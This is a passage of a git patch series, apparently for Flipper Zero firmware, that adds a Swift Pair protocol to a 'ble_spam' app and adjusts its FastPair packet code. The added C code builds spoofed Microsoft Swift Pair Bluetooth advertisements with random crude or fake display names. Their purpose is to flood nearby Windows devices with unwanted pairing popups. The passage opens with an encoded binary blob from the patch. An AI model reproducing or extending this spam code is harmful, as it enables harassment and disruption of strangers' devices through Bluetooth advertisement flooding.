zSzr|BVDwlxpvUDXDr*EDfh$N);|4|EW$a+lVC{Gl!rKFcQ7l8THXmb`@I8!A5k_DC z5RoGKg#eVT0Pj#JUJlqOfp_v0&&#Zz;aTK#BsVTi;C~8{`)f|5LM)+iS?t@?68dl3 zo>Ul6M}eB;7}RGd_jJ16r#J(Dujeb3Zr9TUNe&ws62HTA4bwFw28N_OoL$3o4T*sv zDGz7Y|3;U&|A`TW;D=ruo(B*8x~d(XCA0lAD&532{NA*0+d3E-8L6s|!2{@F+)V3> z^KXN}9Npus$hlz7%P1OM{N-9Z42d3hnQ!!|Rh@6;5ln98iH{$?Fe7X3l+El~s&qDb zlgQZ1Z=35;t~Tzj4iu0JAKmUdzoV=8)l2u#* literal 0 HcmV?d00001 diff --git a/applications/external/ble_spam/protocols/_registry.c b/applications/external/ble_spam/protocols/_registry.c index 9ede92816..3d334fa14 100644 --- a/applications/external/ble_spam/protocols/_registry.c +++ b/applications/external/ble_spam/protocols/_registry.c @@ -3,6 +3,7 @@ const BleSpamProtocol* ble_spam_protocols[] = { &ble_spam_protocol_continuity, &ble_spam_protocol_fastpair, + &ble_spam_protocol_swiftpair, }; const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols); diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h index f4c41c4f4..69070c356 100644 --- a/applications/external/ble_spam/protocols/_registry.h +++ b/applications/external/ble_spam/protocols/_registry.h @@ -2,10 +2,12 @@ #include "continuity.h" #include "fastpair.h" +#include "swiftpair.h" union BleSpamMsg { ContinuityMsg continuity; FastpairMsg fastpair; + SwiftpairMsg swiftpair; }; extern const BleSpamProtocol* ble_spam_protocols[]; diff --git a/applications/external/ble_spam/protocols/swiftpair.c b/applications/external/ble_spam/protocols/swiftpair.c new file mode 100644 index 000000000..26ea203e4 --- /dev/null +++ b/applications/external/ble_spam/protocols/swiftpair.c @@ -0,0 +1,54 @@ +#include "swiftpair.h" +#include "_registry.h" + +// Hacked together by @Willy-JL and @Spooks4576 +// Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair + +const char* swiftpair_get_name(const BleSpamMsg* _msg) { + const SwiftpairMsg* msg = &_msg->swiftpair; + UNUSED(msg); + return "SwiftPair"; +} + +void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { + const SwiftpairMsg* msg = _msg ? &_msg->swiftpair : NULL; + + const char* display_name; + if(msg && msg->display_name[0] != '\0') { + display_name = msg->display_name; + } else { + const char* names[] = { + "Assquach💦", + "Flipper 🐬", + "iOS 17 🍎", + "Kink💦", + "👉👌", + "🔵🦷", + }; + display_name = names[rand() % COUNT_OF(names)]; + } + uint8_t display_name_len = strlen(display_name); + + uint8_t size = 7 + display_name_len; + uint8_t* packet = malloc(size); + uint8_t i = 0; + + packet[i++] = size - 1; // Size + packet[i++] = 0xFF; // AD Type (Manufacturer Specific) + packet[i++] = 0x06; // Company ID (Microsoft) + packet[i++] = 0x00; // ... + packet[i++] = 0x03; // Microsoft Beacon ID + packet[i++] = 0x00; // Microsoft Beacon Sub Scenario + packet[i++] = 0x80; // Reserved RSSI Byte + memcpy(&packet[i], display_name, display_name_len); // Display Name + i += display_name_len; + + *out_size = size; + *out_packet = packet; +} + +const BleSpamProtocol ble_spam_protocol_swiftpair = { + .icon = &I_windows, + .get_name = swiftpair_get_name, + .make_packet = swiftpair_make_packet, +}; diff --git a/applications/external/ble_spam/protocols/swiftpair.h b/applications/external/ble_spam/protocols/swiftpair.h new file mode 100644 index 000000000..5ded8ebf8 --- /dev/null +++ b/applications/external/ble_spam/protocols/swiftpair.h @@ -0,0 +1,11 @@ +#pragma once +#include "_base.h" + +// Hacked together by @Willy-JL and @Spooks4576 +// Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair + +typedef struct { + char display_name[25]; +} SwiftpairMsg; + +extern const BleSpamProtocol ble_spam_protocol_swiftpair; From f9d704f154ee190983f5e0009425ec9f56cc09bf Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 15 Oct 2023 20:12:46 +0100 Subject: [PATCH 20/20] Flags arent needed --- applications/external/ble_spam/protocols/fastpair.c | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/applications/external/ble_spam/protocols/fastpair.c b/applications/external/ble_spam/protocols/fastpair.c index 5cd91dd66..8f329492e 100644 --- a/applications/external/ble_spam/protocols/fastpair.c +++ b/applications/external/ble_spam/protocols/fastpair.c @@ -36,14 +36,10 @@ void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpam model_id = models[rand() % COUNT_OF(models)]; } - uint8_t size = 17; + uint8_t size = 14; uint8_t* packet = malloc(size); uint8_t i = 0; - packet[i++] = 2; // Size - packet[i++] = 0x01; // AD Type (Flags) - packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED - packet[i++] = 3; // Size packet[i++] = 0x03; // AD Type (Service UUID List) packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)